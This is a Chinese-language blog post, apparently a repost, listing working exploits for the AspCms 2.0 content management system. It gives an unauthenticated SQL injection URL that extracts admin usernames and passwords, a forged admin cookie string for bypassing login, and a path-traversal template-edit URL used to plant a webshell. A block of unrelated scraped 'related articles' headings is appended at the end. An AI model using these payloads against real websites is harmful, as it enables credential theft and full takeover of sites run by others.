admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

————————————————————————
Powered by AspCms2.0
未验证权限,且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名:aspcms_user
列名:loginname、password

利用EXP:

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

2.0漏洞测试人:逍遥复仇(请注明)

——————Cookies欺骗——————

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

逍遥复仇碰到一个站后台被管理员改了,NND。后台主页半天没有找到,最后去官方down源码查看是home.asp(版本不同如不对请试main.asp),工具为:Cookie & Inject Browser
——————webshell获取——————
所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了

admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp

转载于:https://blog.51cto.com/0daysec/1571383

aspcms各版本漏洞0day集合相关推荐

  1. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

    ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...

  2. EKL软件历史版本下载地址集合

    EKL软件历史版本下载地址集合 下载地址: https://elasticsearch.cn/download/

  3. 利用samba漏洞入侵linux主机(samba低版本漏洞利用)

    复现samba漏洞入侵linux主机(samba低版本漏洞利用) Samba是在Linux和UNIX系统上实现,由服务器及客户端程序构成.SMB(Server Messages Block,信息服务块 ...

  4. OPENSTACK Train版本安装大集合

    OPENSTACK Train版本安装大集合 0. openstack 云计算介绍 1. 服务器安装centos7 操作系统 1.1 关闭防火墙 2. 配置网络-ip地址及注意事项 3 centos7 ...

  5. TP5框架低版本漏洞

    TP5框架低版本漏洞 漏洞1: 描述:未对控制器名做严格过滤,导致非法用户可以通过将控制器名写为带完整命名空间类的方式来调起系统所有公共类的方法. 代码:\thinkphp\library\think ...

  6. SonicWall 督促客户立即修复NSM 本地版本漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士 SonicWall 督促客户立即修复影响 Network Security Manager (NSM) 多租户防火墙管理解决方案本地版本的 ...

  7. VMware Mac版本漏洞可任意执行恶意代码

    日前安全研究人员发现了一个存在于虚拟化软件VMware Mac版本Fusion中的严重安全漏洞,该漏洞可以通过Windows虚拟机在Mac主机上执行恶意代码,VMware已经发布了Fusion 2.0 ...

  8. [网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)

    这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步.前文分享了文件上传漏洞和IIS6.0解析漏洞,包括PHP345文件绕过上传.Win ...

  9. java 1.8.0 安全_RedHat安全更新修复OpenJDK1.8.0版本漏洞

    综述 RedHat发布安全补丁通告,修复了多个java-1.8.0-openjdk的安全问题. 相关链接: https://access.redhat.com/errata/RHSA-2018:009 ...

最新文章

  1. 数学界的高冷之王,N次拒绝巨额奖金:我穷,但是我不缺钱。。。
  2. java udp丢包_linux 系统 UDP 丢包问题分析思路
  3. sql-C#-类型对应
  4. cross_compile = arm-linux-,cross compile grpc for arm
  5. kafka集群搭建(消息)
  6. 【转】8 个效果惊人的 WebGL/JavaScript 演示
  7. 基于粒子群优化深度核极限学习机的故障诊断方法
  8. 清理C盘——这个操作让你的C盘多出20G空间
  9. 淘宝返利是怎么回事?是真的还是假的?
  10. 课程设计题七:交通灯控制器
  11. html网页两边有空隙,怎么让整个内容缩进?就是四周都有间隙。
  12. [Vue warn]: You may have an infinite update loop in watcher with express
  13. java之21点游戏(只包含一个玩家和一个庄家,是否抓牌,没有黑杰克)
  14. 九连环问题c语言程序,九连环答案生成器的C源程序 (转)
  15. 计算机综合能力描述,计算机综合应用能力实训报告
  16. 游戏开发中2D场景下实现伪3D碰撞检测方法
  17. [Python] 先读后覆盖写文件
  18. 实木地板被机器人弄成坑_如果当初知道这些,就不会在实木地板上被坑了!
  19. Tecnomatix plant simulation基础及Simtalk编程入门视频教程
  20. 2022年8月上海PMP®项目管理认证招生简章

热门文章

  1. 推荐 10 个有趣的 Python 项目
  2. 如何安装mysql5.6.16_centos安装mysql5.6.16
  3. mysql存储过程日期类型_mysql中多种日期类型的格式话---用存储过程实现
  4. Spring构造注入
  5. 在项目中缓存是如何使用的?为什么要用缓存?缓存使用不当会造成什么后果?
  6. ConcurrentHashMap的源码分析-JDK1.7和Jdk1.8版本的变化
  7. Redis中的哨兵机制的不足
  8. mybatis扫描mapper的xml文件参数
  9. annotationdriven
  10. 使用ln -s解决库冲突的问题